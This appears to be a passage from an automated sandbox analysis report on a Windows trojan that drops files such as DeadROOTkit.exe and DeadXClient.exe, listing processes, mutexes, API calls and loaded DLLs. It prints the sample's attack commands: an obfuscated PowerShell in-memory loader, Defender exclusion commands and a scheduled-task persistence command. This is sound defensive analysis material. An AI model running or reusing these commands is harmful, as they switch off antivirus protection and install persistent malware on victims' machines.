Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr | Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/83@5/4
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
Source: C:\Users\Public\DeadCodeRootKit.exe | Code function: 3_2_00B01672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString
Source: C:\Users\Public\DeadCodeRootKit.exe | Code function: 3_2_00B017A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\Public\Deadsvchost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Mutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\Public\DeadROOTkit.exe | Mutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Users\Public\DeadXClient.exe | Mutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
Source: C:\Users\Public\DeadROOTkit.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: mIURiU8n2P.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mIURiU8n2P.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mIURiU8n2P.exe | ReversingLabs: Detection: 73%
Source: mIURiU8n2P.exe | Virustotal: Detection: 67%
Source: unknown | Process created: C:\Users\user\Desktop\mIURiU8n2P.exe "C:\Users\user\Desktop\mIURiU8n2P.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+
''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
                          Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Users\Public\DeadROOTkit.exe Process created: unknown unknown
                          Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                          Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: mscoree.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: apphelp.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: version.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: uxtheme.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: sspicli.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptsp.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: rsaenh.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptbase.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.storage.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: wldp.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: propsys.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: profapi.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: edputil.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: urlmon.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: iertutil.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: srvcli.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: netutils.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: wintypes.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: appresolver.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: slc.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: userenv.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: sppc.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: sxs.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: mpr.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: scrrun.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: linkinfo.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: ntshrui.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: cscapi.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: mswsock.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: dnsapi.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: amsi.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: avicap32.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: msvfw32.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: winmm.dll
                          Source: C:\Users\Public\DeadXClient.exe Section loaded: pdh.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mscoree.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: apphelp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: version.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: uxtheme.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sspicli.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptsp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rsaenh.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptbase.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: amsi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: userenv.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: profapi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.storage.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wldp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasapi32.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasman.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rtutils.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mswsock.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winhttp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc6.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dnsapi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winnsi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: propsys.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: edputil.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: urlmon.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iertutil.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: srvcli.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: netutils.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wintypes.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: appresolver.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: slc.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sppc.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: pdh.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sxs.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mpr.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: scrrun.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: linkinfo.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntshrui.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cscapi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: secur32.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: schannel.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: textinputframework.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coreuicomponents.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coremessaging.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntmarta.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mskeyprotect.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntasn1.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncrypt.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncryptsslp.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msasn1.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: gpapi.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: avicap32.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msvfw32.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll
                          Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: apphelp.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptsp.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: rsaenh.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptbase.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: sspicli.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: xmllite.dll
                          Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
                          Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                          Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                          Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
                          Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: apphelp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
